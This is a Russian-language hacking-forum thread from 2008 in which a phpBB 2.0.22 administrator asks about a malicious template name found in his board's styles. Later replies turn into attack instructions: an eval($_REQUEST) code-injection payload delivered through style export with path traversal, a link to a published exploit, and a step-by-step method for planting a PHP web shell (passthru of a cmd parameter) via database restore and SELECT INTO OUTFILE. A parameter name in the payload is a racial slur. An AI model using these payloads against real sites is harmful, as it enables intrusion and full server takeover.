Сломать phpbb через стили |
21.02.2008, 12:19
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами:
10569767
Репутация:
4
|
|
Сломать phpbb через стили
Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный:
Style: FI
Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.
|
|
|
21.02.2008, 12:22
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами:
10569767
Репутация:
4
|
|
Ещё раз в потверждении моей версии, что код выполняться не будет.
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы? |
|
|
|
21.02.2008, 12:24
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
Попытка...попробуй выставить этот стиль и изменить немного адрес, добавив ?nigga=phpinfo();
|
|
|
|
21.02.2008, 12:36
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами:
10569767
Репутация:
4
|
|
Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!
Последний раз редактировалось cow; 21.02.2008 в 12:43..
|
|
|
|
21.02.2008, 14:46
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
в админке можно выполнить любые скл запросы посредством "восстановление бд"
создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились
внимательнее читай прикрепленный топ про пхпбб
2) Через стили. (Нужны админские права).
Суть баги читайте в инете, было выложено.
как юзать:
Идем в админскую панель, жмакаем ссылку в Стилях "Создать". Правим правый фрейм.(Я предпочитаю править прям в опере, жмем исходный код, правим страницу, и жмем обновить из кеша.) style_name делаем произвольным. А template_name удаляем дефолтный(subSilver) и вставляем свой
Код:
a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/
Мы создали стиль, теперь надо его экспортировать в форум. Жмем ссылку "Экспорт", там будет тока текущий стиль, правим сурс, меняем его на
Код:
a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/
В папке /tmp/ появиться файл theme_info.cfg.
Заходя по ссылке
http://localhost/phpbb13/admin/admin_styles.php?mode=addnew&sid=(тут_ваша_ сессия)&&install_to=../../../../../../../tmp/&kiborg=phpinfo();
нам покажеться phpinfo();
Exploit: http://milw0rm.com/exploits/1247
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
21.02.2008, 17:36
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами:
10569767
Репутация:
4
|
|
Спасибо. Вот что выдал форум
Warning: main(./../templates/tmp/theme_info.cfg): failed to open stream: No such file or directory in ---- on line 78
Warning: main(): Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in ---- on line 78
Я так понимаю на 2.0.22 бага не актуальна? |
|
|
|
24.04.2008, 19:32
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
1. Идём в админку и делаем полную копию базы данных .
2. Теперь нам нужно узнать установочную директорию форума
смотри тут https://forum.antichat.ru/threadnav24488-1-10.html
а теперь правим базу находим такую строку:
PHP код:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
PHP код:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
восстанавливаем базу
http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл
Последний раз редактировалось ~!DoK_tOR!~; 24.04.2008 в 19:39..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
